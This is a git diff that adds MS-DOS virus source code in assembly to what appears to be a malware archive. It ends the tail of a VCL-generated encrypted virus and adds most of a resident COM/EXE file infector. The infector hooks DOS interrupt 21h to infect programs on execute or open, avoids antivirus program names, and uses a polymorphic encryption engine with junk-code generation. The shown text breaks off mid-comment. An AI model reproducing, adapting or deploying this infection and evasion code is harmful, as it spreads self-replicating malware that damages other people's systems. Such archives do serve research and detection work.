; New jump to virus
+infect_file endp
+
+
+ db 06Ah,025h,0C8h,0A7h,094h
+
+infected_all proc near
+if virus_type eq 0
+ mov al,byte ptr [di + set_carry]
+else
+ mov al,byte ptr [set_carry] ; AX holds success value
+endif
+ cbw ; Sign-extend AL into AX
+ ret ; Return to caller
+infected_all endp
+
+data00 db 7,7,7,"** CODE ZERO **",13,10,0
+
+vcl_marker db "[VCL]",0 ; VCL creation marker
+
+
+note db "[Code Zero]",0
+ db "Nowhere Man, [NuKE] '92",0
+
+encrypt_code proc near
+ push bp ; Save BP
+ mov bp,di ; Use BP as pointer to code
+ lea si,[bp + encrypt_decrypt]; SI points to cipher routine
+
+ xor ah,ah ; BIOS get time function
+ int 01Ah
+ mov word ptr [si + 9],dx ; Low word of timer is new key
+
+ xor byte ptr [si + 1],8 ;
+ xor byte ptr [si + 8],1 ; Change all SIs to DIs
+ xor word ptr [si + 11],0101h; (and vice-versa)
+
+ lea di,[bp + finish] ; Copy routine into heap
+ mov cx,finish - encrypt_decrypt - 1 ; All but final RET
+ push si ; Save SI for later
+ push cx ; Save CX for later
+ rep movsb ; Copy the bytes
+
+ lea si,[bp + write_stuff] ; SI points to write stuff
+ mov cx,5 ; CX holds length of write
+ rep movsb ; Copy the bytes
+
+ pop cx ; Restore CX
+ pop si ; Restore SI
+ inc cx ; Copy the RET also this time
+ rep movsb ; Copy the routine again
+
+ mov ah,040h ; DOS write to file function
+ lea dx,[bp + start] ; DX points to virus
+
+ lea si,[bp + finish] ; SI points to routine
+ call si ; Encrypt/write/decrypt
+
+ mov di,bp ; DI points to virus again
+ pop bp ; Restore BP
+ ret ; Return to caller
+
+write_stuff: mov cx,finish - start ; Length of code
+ int 021h
+encrypt_code endp
+
+end_of_code label near
+
+encrypt_decrypt proc near
+ lea si,[bp + start_of_code] ; SI points to code to decrypt
+ mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
+xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
+ inc si ; Do the next word
+ inc si ;
+ loop xor_loop ; Loop until we're through
+ ret ; Return to caller
+encrypt_decrypt endp
+finish label 
near
+
+code ends
+ end main
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.coffshop.asm b/MSDOS/Virus.MSDOS.Unknown.coffshop.asm
new file mode 100644
index 00000000..323049f1
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.coffshop.asm
@@ -0,0 +1,1662 @@
+ .RADIX 16
+
+
+_TEXT segment
+
+ assume cs:_TEXT, ds:_TEXT
+
+
+VERSION equ 3
+PICLEN equ last - beeld ;length of picture routine
+FILELEN equ last - first ;length of virus
+FILEPAR equ (FILELEN + 0F)/10 ;length of virus in paragraphs
+VIRPAR equ 00D0 ;space for resident virus
+WORKPAR equ 0160 ;work space for engine
+STACKOFF equ 1000 ;Stack offset
+DATAPAR equ 0050 ;extra memory allocated
+BUFLEN equ 1C ;length of buffer
+
+
+;****************************************************************************
+;* data area for virus
+;****************************************************************************
+
+ org 00E0
+
+mutstack dw 0, 0
+oldlen dw 0, 0
+oi21 dw 0, 0
+minibuf db 0, 0, 0, 0
+
+
+;****************************************************************************
+;* data area for engine
+;****************************************************************************
+
+add_val dw 0
+xor_val dw 0
+xor_offset dw 0
+where_len dw 0
+where_len2 dw 0
+flags db 0
+
+
+;******************************************************************************
+;* Begin of virus, installation in memory
+;******************************************************************************
+
+ org 0100
+
+first: call next ;get IP
+next: pop si
+
+ sub si,low 3 ;SI = begin virus
+ mov di,0100
+ cld
+
+ push ax ;save registers
+ push ds
+ push es
+ push di
+ push si
+
+ mov ah,30 ;DOS version >= 3.1?
+ int 21
+ xchg ah,al
+ cmp ax,030A
+ jb not_install
+
+ mov ax,33DA ;already resident? 
+ int 21
+ cmp ah,0A5
+ je not_install
+
+ mov ax,es ;adjust memory-size
+ dec ax
+ mov ds,ax
+ xor bx,bx
+ cmp byte ptr [bx],5A
+ jne not_install
+ mov ax,[bx+3]
+ sub ax,(VIRPAR+WORKPAR)
+ jb not_install
+ mov [bx+3],ax
+ sub word ptr ds:[bx+12],(VIRPAR+WORKPAR)
+
+ mov es,[bx+12] ;copy program to top
+ push cs
+ pop ds
+ mov cx,FILELEN
+ rep movsb
+
+ push es
+ pop ds
+
+ mov ax,3521 ;get original int21 vector
+ int 21
+ mov ds:[oi21],bx
+ mov ds:[oi21+2],es
+
+ mov dx,offset ni21 ;install new int21 handler
+ mov ax,2521
+ int 21
+
+ mov ax,33DBh ;init. random nr. generator
+ int 21
+
+ mov ah,2A ;ask date
+ int 21
+ cmp al,5 ;friday ?
+ jne not_install
+ mov ah,2C ;ask time
+ int 21
+ or dh,dh ;sec = 0 ?
+ jnz not_install
+
+ mov ax,33DC ;show picture
+ int 21
+
+not_install: pop si ;restore registers
+ pop di
+ pop es
+ pop ds
+ pop ax
+
+ add si,(offset buffer)
+ sub si,di
+ cmp byte ptr cs:[si],4Dh ;COM or EXE ?
+ je entryE
+
+entryC: push di
+ mov cx,BUFLEN
+ rep movsb
+ ret
+
+entryE: mov bx,ds ;calculate CS
+ add bx,low 10
+ mov cx,bx
+ add bx,cs:[si+0E]
+ cli ;restore SS and SP
+ mov ss,bx
+ mov sp,cs:[si+10]
+ sti
+ add cx,cs:[si+16]
+ push cx ;push new CS on stack
+ push cs:[si+14] ;push new IP on stack
+ db 0CBh ;retf
+
+
+;******************************************************************************
+;* Interupt 24 handler
+;******************************************************************************
+
+ni24: mov al,3 ;to avoid 'Abort, Retry, ...'
+ iret
+
+
+;******************************************************************************
+;* Interupt 21 handler
+;******************************************************************************
+
+ni21: pushf
+
+ cmp ax,33DA ;install-check ?
+ jne not_ic
+ mov ax,0A500+VERSION ;return a signature
+ popf
+ iret
+
+not_ic: push es ;save registers
+ push ds
+ push si
+ push di
+ push dx
+ push cx
+ push bx
+ push ax
+
+ cmp ax,33DBh ;rnd init ? 
+ jne not_ri
+ call rnd_init
+ jmp short no_infect
+
+not_ri: cmp ax,33DC ;show picture?
+ je show_pic
+
+not_pi: cmp ax,4B00 ;execute ?
+ je do_it
+
+ cmp ax,6C00 ;open DOS 4.0+ ?
+ jne no_infect
+ test bl,3
+ jnz no_infect
+ mov dx,di
+
+do_it: call infect
+
+no_infect: pop ax ;restore registers
+ pop bx
+ pop cx
+ pop dx
+ pop di
+ pop si
+ pop ds
+ pop es
+ popf
+
+org21: jmp dword ptr cs:[oi21] ;call to old int-handler
+
+
+;******************************************************************************
+;* Show picture
+;******************************************************************************
+
+show_pic: mov ax,offset no_infect ;push return adres on stack
+ push cs
+ push ax
+
+ mov di,((VIRPAR*10)+0100) ;move picture routine
+ mov si,offset beeld
+ mov cx,PICLEN
+ push cs
+ pop ds
+ push cs
+ pop es
+ rep movsb
+
+ mov ax,cs ;calculate segment registers
+ add ax,low VIRPAR
+ mov ds,ax
+ mov es,ax
+
+ push ax ;push picture adres on stack
+ mov ax,0100
+ push ax
+
+ db 0CBh ;(retf) goto picture routine
+
+
+;******************************************************************************
+;* Tries to infect the file
+;******************************************************************************
+
+infect: cld
+
+ push cs ;copy filename to CS:0000
+ pop es
+ mov si,dx
+ xor di,di
+ mov cx,0080
+namemove: lodsb
+ cmp al,0
+ je moved
+ cmp al,'a'
+ jb char_ok
+ cmp al,'z'
+ ja char_ok
+ xor al,20 ;convert to upper case
+char_ok: stosb
+ loop namemove
+return0: ret
+
+moved: stosb ;put last zero after filename
+ lea si,[di-5]
+ push cs
+ pop ds
+
+ lodsw ;check extension .COM or .EXE
+ cmp ax,'E.'
+ jne not_exe
+ lodsw
+ cmp ax,'EX'
+ jmp short check
+
+not_exe: cmp ax,'C.' 
+ jne return0
+ lodsw
+ cmp ax,'MO'
+check: jne return0
+
+ std ;find begin of filename
+ mov cx,si
+ inc cx
+searchbegin: lodsb
+ cmp al,':'
+ je checkname
+ cmp al,'\'
+ je checkname
+ loop searchbegin
+ dec si
+
+checkname: cld ;check filename
+ lodsw
+ lodsw
+ mov di,offset names
+ mov cl,13
+ repnz scasw
+ je return0
+
+ mov ax,3300 ;get ctrl-break flag
+ int 21
+ push dx ;save flag on stack
+
+ cwd ;clear the flag
+ inc ax
+ push ax
+ int 21
+
+ mov ax,3524 ;get int24 vector
+ int 21
+ push es ;save vector on stack
+ push bx
+
+ push cs
+ pop ds
+
+ mov dx,offset ni24 ;install new int24 handler
+ mov ah,25
+ push ax
+ int 21
+
+ mov ax,4300 ;ask file-attributes
+ cwd
+ int 21
+ push cx ;save attributes on stack
+
+ xor cx,cx ;clear attributes
+ mov ax,4301
+ push ax
+ int 21
+ jc return1v
+
+ mov ax,3D02 ;open the file
+ int 21
+ jnc opened
+return1v: jmp return1
+
+opened: xchg ax,bx ;save handle
+
+ mov ax,5700 ;get file date & time
+ int 21
+ push dx ;save date & time on stack
+ push cx
+
+ mov cx,BUFLEN ;read begin of file
+ mov si,offset buffer
+ mov dx,si
+ call read
+ jc closev
+
+ mov ax,4202 ;goto end, get filelength
+ xor cx,cx
+ cwd
+ int 21
+
+ mov di,offset oldlen ;save filelength
+ mov [di],ax
+ mov [di+2],dx
+
+ mov ax,word ptr [si+12] ;already infected?
+ add al,ah
+ cmp al,'@'
+ jz closev
+
+ cmp word ptr [si],'ZM' ;EXE ?
+ je do_EXE
+
+do_COM: test byte ptr [si],80 ;maybe a strange EXE?
+ jz closev
+
+ mov ax,word ptr [di] ;check lenght of file
+ cmp ah,0D0
+ jae closev
+ cmp ah,1
+ jb closev
+
+ mov dx,ax
+ add dx,0100
+ call writeprog ;call Engine and write virus
+ jne closev
+
+ mov byte ptr [si],0E9 ;put 'JMP xxxx' at begin
+ sub ax,low 3
+ mov word ptr [si+1],ax
+ jmp done
+
+closev: jmp close
+
+do_EXE: cmp word ptr [si+18],40 ;is it a windows/OS2 EXE ? 
+ jb not_win
+
+ mov ax,003C
+ cwd
+ call readbytes
+ jc closev
+
+ mov ax,word ptr [di+8]
+ mov dx,word ptr [di+0A]
+ call readbytes
+ jc closev
+
+ cmp byte ptr [di+9],'E'
+ je closev
+
+not_win: call getlen
+ call calclen ;check for internal overlays
+ cmp word ptr [si+4],ax
+ jne close
+ cmp word ptr [si+2],dx
+ jne close
+
+ cmp word ptr [si+0C],0 ;high memory allocation?
+ je close
+
+ cmp word ptr [si+1A],0 ;overlay nr. not zero?
+ jne close
+
+ call getlen ;calculate new CS & IP
+ mov cx,0010
+ div cx
+ sub ax,word ptr [si+8]
+ dec ax
+ add dx,low 10
+
+ call writeprog ;call Engine and write virus
+ jne close
+
+ mov word ptr [si+16],ax ;put CS in header
+ mov word ptr [si+0E],ax ;put SS in header
+ mov word ptr [si+14],dx ;put IP in header
+ mov word ptr [si+10],STACKOFF ;put SP in header
+
+ call getlen
+ add ax,cx
+ adc dx,0
+ call calclen ;put new length in header
+ mov word ptr [si+4],ax
+ mov word ptr [si+2],dx
+
+ lea di,[si+0A] ;adjust mem. allocation info
+ call mem_adjust
+ lea di,[si+0C]
+ call mem_adjust
+
+done: call gotobegin
+ call rnd_get ;signature
+ mov ah,'@'
+ sub ah,al
+ mov word ptr [si+12],ax
+ mov cx,BUFLEN ;write new begin
+ mov dx,si
+ mov ah,40
+ int 21
+
+close: pop cx ;restore date & time
+ pop dx
+ mov ax,5701
+ int 21
+
+ mov ah,3E ;close the file
+ int 21
+
+return1: pop ax ;restore attributes
+ pop cx
+ cwd
+ int 21
+
+ pop ax ;restore int24 vector
+ pop dx
+ pop ds
+ int 21
+
+ pop ax ;restore ctrl-break flag
+ pop dx
+ int 21
+
+ ret
+
+
+;******************************************************************************
+;* Filenames to avoid
+;******************************************************************************
+
+names: db 'CO', 'SC', 'CL', 'VS', 'NE', 'HT', 'TB', 'VI'
+ db 'FI', 'GI', 'RA', 'FE', 'MT', 'BR', 'IM', ' '
+ db ' ', ' ', ' '
+
+
+;******************************************************************************
+;* Write virus to the program 
+;******************************************************************************
+
+writeprog: push ax ;save registers
+ push dx
+ push si
+ push bp
+ push es
+
+ cli
+ mov word ptr [di-4],ss ;save SS & SP
+ mov word ptr [di-2],sp
+
+ mov ax,cs ;new stack & buffer-segment
+ mov ss,ax
+ mov sp,((VIRPAR + WORKPAR) * 10)
+ add ax,low VIRPAR
+ mov es,ax
+ sti
+
+ push ds
+
+ mov bp,dx ;input parameters for engine
+ mov dx,0100
+ mov cx,FILELEN
+ xor si,si
+ mov al,0Fh
+
+ push di
+ push bx
+
+ call crypt ;call the Engine
+
+ pop bx
+ pop di
+
+ push cx
+ push dx
+ mov ax,4202 ;goto end
+ xor cx,cx
+ cwd
+ int 21
+ pop dx
+ pop cx
+
+ mov ah,40 ;write virus
+ int 21
+ cmp ax,cx ;are all bytes written?
+
+ pop ds
+
+ cli
+ mov ss,word ptr [di-4] ;restore stack
+ mov sp,word ptr [di-2]
+ sti
+
+ pop es ;restore registers
+ pop bp
+ pop si
+ pop dx
+ pop ax
+
+ ret
+
+
+;******************************************************************************
+;* Adjust mem allocation info in EXE header
+;******************************************************************************
+
+mem_adjust: mov ax,[di]
+ sub ax,low FILEPAR ;alloc. 
may be this much less
+ jb more
+ cmp ax,DATAPAR ;minimum amount to allocate
+ jae mem_ok
+more: mov ax,DATAPAR
+mem_ok: mov [di],ax
+ ret
+
+
+;****************************************************************************
+;* Read a few bytes
+;****************************************************************************
+
+readbytes: call goto
+ mov dx,offset minibuf
+ mov cx,4
+read: mov ah,3F
+ int 21
+ ret
+
+
+;****************************************************************************
+;* Calculate length for EXE header
+;****************************************************************************
+
+calclen: mov cx,0200
+ div cx
+ or dx,dx
+ jz no_cor
+ inc ax
+no_cor: ret
+
+
+;****************************************************************************
+;* Get original length of program
+;****************************************************************************
+
+getlen: mov ax,[di]
+ mov dx,[di+2]
+ ret
+
+
+;****************************************************************************
+;* Goto new offset DX:AX
+;****************************************************************************
+
+gotobegin: xor ax,ax
+ cwd
+goto: xchg cx,dx
+ xchg ax,dx
+ mov ax,4200
+ int 21
+ ret
+
+
+;****************************************************************************
+;*
+;* Encryption Engine
+;*
+;*
+;* Input: ES work segment
+;* DS:DX code to encrypt
+;* BP what will be start of decryptor
+;* SI what will be distance between decryptor and code
+;* CX length of code
+;* AX flags: bit 0: DS will not be equal to CS
+;* bit 1: insert random instructions
+;* bit 2: put junk before decryptor
+;* bit 3: preserve AX with decryptor
+;*
+;* Output: ES: work segment (preserved)
+;* DS:DX decryptor + encrypted code
+;* BP what will be start of decryptor (preserved)
+;* DI length of decryptor / offset of encrypted code
+;* CX length of decryptor + encrypted code
+;* AX length of encrypted code
+;* (other registers may be trashed)
+;* 
+;****************************************************************************
+
+ db '[ MK / Trident ]'
+
+crypt: xor di,di ;di = start of decryptor
+ push dx ;save offset of code
+ push si ;save future offset of code
+
+ mov byte ptr ds:[flags],al ;save flags
+ test al,8 ;push AX?
+ jz no_push
+ mov al,50
+ stosb
+
+no_push: call rnd_get ;add a few bytes to cx
+ and ax,1F
+ add cx,ax
+ push cx ;save length of code
+
+ call rnd_get ;get random flags
+ xchg ax,bx
+ ;BX flags:
+
+ ;0,1 how to encrypt
+ ;2,3 which register for encryption
+ ;4 use byte or word for encrypt
+ ;5 MOV AL, MOV AH or MOV AX
+ ;6 MOV CL, MOV CH or MOV CX
+ ;7 AX or DX
+
+ ;8 count up or down
+ ;9 ADD/SUB/INC/DEC or CMPSW/SCASW
+ ;A ADD/SUB or INC/DEC
+ ; CMPSW or SCASW
+ ;B offset in XOR instruction?
+ ;C LOOPNZ or LOOP
+ ; SUB CX or DEC CX
+ ;D carry with crypt ADD/SUB
+ ;E carry with inc ADD/SUB
+ ;F XOR instruction value or AX/DX
+
+random: call rnd_get ;get random encryption value
+ or al,al
+ jz random ;again if 0
+ mov ds:[xor_val],ax
+
+ call do_junk ;insert random instructions
+
+ pop cx
+
+ mov ax,0111 ;make flags to remember which
+ test bl,20 ; MOV instructions are used
+ jnz z0
+ xor al,07
+z0: test bl,0C
+ jnz z1
+ xor al,70
+z1: test bl,40
+ jnz z2
+ xor ah,7
+z2: test bl,10
+ jnz z3
+ and al,73
+z3: test bh,80
+ jnz z4
+ and al,70
+
+z4: mov dx,ax
+mov_lup: call rnd_get ;put MOV instructions in
+ and ax,000F ; a random order
+ cmp al,0A
+ ja mov_lup
+
+ mov si,ax
+ push cx ;test if MOV already done
+ xchg ax,cx
+ mov ax,1
+ shl ax,cl
+ mov cx,ax
+ and cx,dx
+ pop cx
+ jz mov_lup
+ xor dx,ax ;remember which MOV done
+
+ push dx
+ call do_mov ;insert MOV instruction
+ call do_nop ;insert a random NOP
+ pop dx
+
+ or dx,dx ;all MOVs done?
+ jnz mov_lup
+
+ push di ;save start of decryptor loop
+
+ call do_add_ax ;add a value to AX in loop?
+ call do_nop
+ test bh,20 ;carry with ADD/SUB ? 
+ jz no_clc
+ mov al,0F8
+ stosb
+no_clc: mov word ptr ds:[xor_offset],0
+ call do_xor ;place all loop instructions
+ call do_nop
+ call do_add
+
+ pop dx ;get start of decryptor loop
+
+ call do_loop
+
+ test byte ptr ds:[flags],8 ;insert POP AX ?
+ jz no_pop
+ mov al,58
+ stosb
+
+no_pop: xor ax,ax ;calculate loop offset
+ test bh,1 ;up or down?
+ jz v1
+ mov ax,cx
+ dec ax
+ test bl,10 ;encrypt with byte or word?
+ jz v1
+ and al,0FE
+v1: add ax,di
+ add ax,bp
+ pop si
+ add ax,si
+ sub ax,word ptr ds:[xor_offset]
+ mov si,word ptr ds:[where_len]
+ test bl,0C ;are BL,BH used for encryption?
+ jnz v2
+ mov byte ptr es:[si],al
+ mov si,word ptr ds:[where_len2]
+ mov byte ptr es:[si],ah
+ jmp short v3
+v2: mov word ptr es:[si],ax
+
+v3: mov dx,word ptr ds:[xor_val] ;encryption value
+
+ pop si ;ds:si = start of code
+
+ push di ;save ptr to encrypted code
+ push cx ;save length of encrypted code
+
+ test bl,10 ;byte or word?
+ jz blup
+
+ inc cx ;cx = # of crypts (words)
+ shr cx,1
+
+lup: lodsw ;encrypt code (words)
+ call do_encrypt
+ stosw
+ loop lup
+ jmp short klaar
+
+
+blup: lodsb ;encrypt code (bytes)
+ xor dh,dh
+ call do_encrypt
+ stosb
+ loop blup
+
+klaar: mov cx,di ;cx = length decryptpr + code
+ pop ax ;ax = length of decrypted code
+ pop di ;di = offset encrypted code
+ xor dx,dx ;ds:dx = decryptor + cr. code
+ push es
+ pop ds
+ ret
+
+
+;****************************************************************************
+;* encrypt the code
+;****************************************************************************
+
+do_encrypt: add dx,word ptr ds:[add_val]
+ test bl,2
+ jnz lup1
+ xor ax,dx
+ ret
+
+lup1: test bl,1
+ jnz lup2
+ sub ax,dx
+ ret
+
+lup2: add ax,dx
+ ret
+
+
+;****************************************************************************
+;* generate mov reg,xxxx
+;****************************************************************************
+
+do_mov: mov dx,si
+ mov al,byte ptr ds:[si+mov_byte]
+ cmp dl,4 ;BX? 
+ jne is_not_bx
+ call add_ind
+is_not_bx: test dl,0C ;A*?
+ pushf
+ jnz is_not_a
+ test bl,80 ;A* or D*?
+ jz is_not_a
+ add al,2
+
+is_not_a: call alter ;insert the MOV
+
+ popf ;A*?
+ jnz is_not_a2
+ mov ax,word ptr ds:[xor_val]
+ jmp short sss
+
+is_not_a2: test dl,8 ;B*?
+ jnz is_not_b
+ mov si,offset where_len
+ test dl,2
+ jz is_not_bh
+ add si,2
+is_not_bh: mov word ptr ds:[si],di
+ jmp short sss
+
+is_not_b: mov ax,cx ;C*
+ test bl,10 ;byte or word encryption?
+ jz sss
+ inc ax ;only half the number of bytes
+ shr ax,1
+sss: test dl,3 ;byte or word register?
+ jz is_x
+ test dl,2 ;*H?
+ jz is_not_h
+ xchg al,ah
+is_not_h: stosb
+ ret
+
+is_x: stosw
+ ret
+
+
+;****************************************************************************
+;* insert MOV or alternative for MOV
+;****************************************************************************
+
+alter: push bx
+ push cx
+ push ax
+ call rnd_get
+ xchg ax,bx
+ pop ax
+ test bl,3 ;use alternative for MOV?
+ jz no_alter
+
+ push ax
+ and bx,0F
+ and al,08
+ shl ax,1
+ or bx,ax
+ pop ax
+
+ and al,7
+ mov cl,9
+ xchg ax,cx
+ mul cl
+
+ add ax,30C0
+ xchg al,ah
+ test bl,4
+ jz no_sub
+ mov al,28
+no_sub: call maybe_2
+ stosw
+
+ mov al,80
+ call maybe_2
+ stosb
+
+ mov ax,offset add_mode
+ xchg ax,bx
+ and ax,3
+ xlat
+
+ add al,cl
+no_alter: stosb
+ pop cx
+ pop bx
+ ret
+
+
+;****************************************************************************
+;* insert ADD AX,xxxx
+;****************************************************************************
+
+do_add_ax: push cx
+ mov si,offset add_val ;save add-value here
+ mov word ptr ds:[si],0
+ mov ax,bx
+ and ax,8110
+ xor ax,8010
+ jnz no_add_ax ;use ADD?
+
+ mov ax,bx
+ xor ah,ah
+ mov cl,3
+ div cl
+ or ah,ah
+ jnz no_add_ax ;use ADD?
+
+ test bl,80
+ jnz do_81C2 ;AX or DX? 
+ mov al,5
+ stosb
+ jmp short do_add0
+do_81C2: mov ax,0C281
+ stosw
+do_add0: call rnd_get
+ mov word ptr ds:[si],ax
+ stosw
+no_add_ax: pop cx
+ ret
+
+
+;****************************************************************************
+;* generate encryption command
+;****************************************************************************
+
+do_xor: test byte ptr ds:[flags],1
+ jz no_cs
+ mov al,2E ;insert CS: instruction
+ stosb
+
+no_cs: test bh,80 ;type of XOR command
+ jz xor1
+
+ call get_xor ;encrypt with register
+ call do_carry
+ call save_it
+ xor ax,ax
+ test bl,80
+ jz xxxx
+ add al,10
+xxxx: call add_dir
+ test bh,8
+ jnz yyyy
+ stosb
+ ret
+
+yyyy: or al,80
+ stosb
+ call rnd_get
+ stosw
+ mov word ptr ds:[xor_offset],ax
+ ret
+
+xor1: mov al,080 ;encrypt with value
+ call save_it
+ call get_xor
+ call do_carry
+ call xxxx
+ mov ax,word ptr ds:[xor_val]
+ test bl,10
+ jmp byte_word
+
+
+;****************************************************************************
+;* generate increase/decrease command
+;****************************************************************************
+
+do_add: test bl,8 ;no CMPSW/SCASW if BX is used
+ jz da0
+ test bh,2 ;ADD/SUB/INC/DEC or CMPSW/SCASW
+ jnz do_cmpsw
+
+da0: test bh,4 ;ADD/SUB or INC/DEC?
+ jz add1
+
+ mov al,40 ;INC/DEC
+ test bh,1 ;up or down?
+ jz add0
+ add al,8
+add0: call add_ind
+ stosb
+ test bl,10 ;byte or word?
+ jz return
+ stosb ;same instruction again
+return: ret
+
+add1: test bh,40 ;ADD/SUB
+ jz no_clc2 ;carry?
+ mov al,0F8 ;insert CLC
+ stosb
+no_clc2: mov al,083
+ stosb
+ mov al,0C0
+ test bh,1 ;up or down?
+ jz add2
+ mov al,0E8
+add2: test bh,40 ;carry?
+ jz no_ac2
+ and al,0CF
+ or al,10
+no_ac2: call add_ind
+ stosb
+ mov al,1 ;value to add/sub
+save_it: call add_1
+ stosb
+ ret
+
+do_cmpsw: test bh,1 ;up or down?
+ jz no_std
+ mov al,0FDh ;insert STD
+ stosb
+no_std: test bh,4 ;CMPSW or SCASW? 
+ jz normal_cmpsw
+ test bl,4 ;no SCASW if SI is used
+ jnz do_scasw
+
+normal_cmpsw: mov al,0A6 ;CMPSB
+ jmp short save_it
+do_scasw: mov al,0AE ;SCASB
+ jmp short save_it
+
+
+;****************************************************************************
+;* generate loop command
+;****************************************************************************
+
+do_loop: test bh,1 ;no JNE if couting down
+ jnz loop_loop ; (prefetch bug!)
+ call rnd_get
+ test al,1 ;LOOPNZ/LOOP or JNE?
+ jnz cx_loop
+
+loop_loop: mov al,0E0
+ test bh,1A ;LOOPNZ or LOOP?
+ jz ll0 ; no LOOPNZ if xor-offset
+ add al,2 ; no LOOPNZ if CMPSW/SCASW
+ll0: stosb
+ mov ax,dx
+ sub ax,di
+ dec ax
+ stosb
+ ret
+
+cx_loop: test bh,10 ;SUB CX or DEC CX?
+ jnz cxl_dec
+ mov ax,0E983
+ stosw
+ mov al,1
+ stosb
+ jmp short do_jne
+
+cxl_dec: mov al,49
+ stosb
+do_jne: mov al,75
+ jmp short ll0
+
+
+;****************************************************************************
+;* add value to AL depending on register type
+;****************************************************************************
+
+add_dir: mov si,offset dir_change
+ jmp short xx1
+
+add_ind: mov si,offset ind_change
+xx1: push bx
+ shr bl,1
+ shr bl,1
+ and bx,3
+ add al,byte ptr ds:[bx+si]
+ pop bx
+ ret
+
+
+;****************************************************************************
+;* mov encryption command byte to AL
+;****************************************************************************
+
+get_xor: push bx
+ mov ax,offset how_mode
+ xchg ax,bx
+ and ax,3
+ xlat
+ pop bx
+ ret
+
+
+;****************************************************************************
+;* change ADD into ADC
+;****************************************************************************
+
+do_carry: test bl,2 ;ADD/SUB used for encryption?
+ jz no_ac
+ test bh,20 ;carry with (encr.) ADD/SUB? 
+ jz no_ac
+ and al,0CF
+ or al,10
+no_ac: ret
+
+
+;****************************************************************************
+;* change AL (byte/word)
+;****************************************************************************
+
+add_1: test bl,10
+ jz add_1_ret
+ inc al
+add_1_ret: ret
+
+
+;****************************************************************************
+;* change AL (byte/word)
+;****************************************************************************
+
+maybe_2: call add_1
+ cmp al,81 ;can't touch this
+ je maybe_not
+ push ax
+ call rnd_get
+ test al,1
+ pop ax
+ jz maybe_not
+ add al,2
+maybe_not: ret
+
+
+;****************************************************************************
+;* get random nop (or not)
+;****************************************************************************
+
+do_nop: test byte ptr ds:[flags],2
+ jz no_nop
+yes_nop: call rnd_get
+ test al,3
+ jz nop8
+ test al,2
+ jz nop16
+ test al,1
+ jz nop16x
+no_nop: ret
+
+
+;****************************************************************************
+;* Insert random instructions
+;****************************************************************************
+
+do_junk: test byte ptr ds:[flags],4
+ jz no_junk
+ call rnd_get ;put a random number of
+ and ax,0F ; dummy instructions before
+ inc ax ; decryptor
+ xchg ax,cx
+junk_loop: call junk
+ loop junk_loop
+no_junk: ret
+
+
+;****************************************************************************
+;* get rough random nop (may affect register values)
+;****************************************************************************
+
+junk: call rnd_get
+ and ax,1E
+ jmp short aa0
+nop16x: call rnd_get
+ and ax,06
+aa0: xchg ax,si
+ call rnd_get
+ jmp word ptr ds:[si+junkcals]
+
+
+;****************************************************************************
+;* NOP and junk addresses
+;****************************************************************************
+
+junkcals dw offset nop16x0
+ dw offset nop16x1 
+ dw offset nop16x2
+ dw offset nop16x3
+ dw offset nop8
+ dw offset nop16
+ dw offset junk6
+ dw offset junk7
+ dw offset junk8
+ dw offset junk9
+ dw offset junkA
+ dw offset junkB
+ dw offset junkC
+ dw offset junkD
+ dw offset junkE
+ dw offset junkF
+
+
+;****************************************************************************
+;* NOP and junk routines
+;****************************************************************************
+
+nop16x0: and ax,000F ;J* 0000 (conditional)
+ or al,70
+ stosw
+ ret
+
+
+nop16x1: mov al,0EBh ;JMP xxxx / junk
+ and ah,07
+ inc ah
+ stosw
+ xchg al,ah ;get lenght of bullshit
+ cbw
+ jmp fill_bullshit
+
+
+nop16x2: call junkD ;XCHG AX,reg / XCHG AX,reg
+ stosb
+ ret
+
+
+nop16x3: call junkF ;INC / DEC or DEC / INC
+ xor al,8
+ stosb
+ ret
+
+
+nop8: push bx ;8-bit NOP
+ and al,7
+ mov bx,offset nop_data8
+ xlat
+ stosb
+ pop bx
+ ret
+
+
+nop16: push bx ;16-bit NOP
+ and ax,0303
+ mov bx,offset nop_data16
+ xlat
+ add al,ah
+ stosb
+ call rnd_get
+ and al,7
+ mov bl,9
+ mul bl
+ add al,0C0
+ stosb
+ pop bx
+ ret
+
+
+junk6: push cx ;CALL xxxx / junk / POP reg
+ mov al,0E8
+ and ah,0F
+ inc ah
+ stosw
+ xor al,al
+ stosb
+ xchg al,ah
+ call fill_bullshit
+ call do_nop
+ call rnd_get ;insert POP reg
+ and al,7
+ call no_sp
+ mov cx,ax
+ or al,58
+ stosb
+
+ test ch,3 ;more? 
+ jnz junk6_ret
+
+ call do_nop
+ mov ax,0F087 ;insert XCHG SI,reg
+ or ah,cl
+ test ch,8
+ jz j6_1
+ mov al,8Bh
+j6_1: stosw
+
+ call do_nop
+ push bx
+ call rnd_get
+ xchg ax,bx
+ and bx,0F7FBh ;insert XOR [SI],xxxx
+ or bl,8
+ call do_xor
+ pop bx
+junk6_ret: pop cx
+ ret
+
+
+junk7: and al,0F ;MOV reg,xxxx
+ or al,0B0
+ call no_sp
+ stosb
+ test al,8
+ pushf
+ call rnd_get
+ popf
+ jmp short byte_word
+
+
+junk8: and ah,39 ;DO r/m,r(8/16)
+ or al,0C0
+ call no_sp
+ xchg al,ah
+ stosw
+ ret
+
+
+junk9: and al,3Bh ;DO r(8/16),r/m
+ or al,2
+ and ah,3F
+ call no_sp2
+ call no_bp
+ stosw
+ ret
+
+
+junkA: and ah,1 ;DO rm,xxxx
+ or ax,80C0
+ call no_sp
+ xchg al,ah
+ stosw
+ test al,1
+ pushf
+ call rnd_get
+ popf
+ jmp short byte_word
+
+
+junkB: call nop8 ;NOP / LOOP
+ mov ax,0FDE2
+ stosw
+ ret
+
+
+junkC: and al,09 ;CMPS* or SCAS*
+ test ah,1
+ jz mov_test
+ or al,0A6
+ stosb
+ ret
+mov_test: or al,0A0 ;MOV AX,[xxxx] or TEST AX,xxxx
+ stosb
+ cmp al,0A8
+ pushf
+ call rnd_get
+ popf
+ jmp short byte_word
+
+
+junkD: and al,07 ;XCHG AX,reg
+ or al,90
+ call no_sp
+ stosb
+ ret
+
+
+junkE: and ah,07 ;PUSH reg / POP reg
+ or ah,50
+ mov al,ah
+ or ah,08
+ stosw
+ ret
+
+
+junkF: and al,0F ;INC / DEC
+ or al,40
+ call no_sp
+ stosb
+ ret
+
+
+;****************************************************************************
+;* store a byte or a word
+;****************************************************************************
+
+byte_word: jz only_byte
+ stosw
+ ret
+
+only_byte: stosb
+ ret
+
+
+;****************************************************************************
+;* don't fuck with SP!
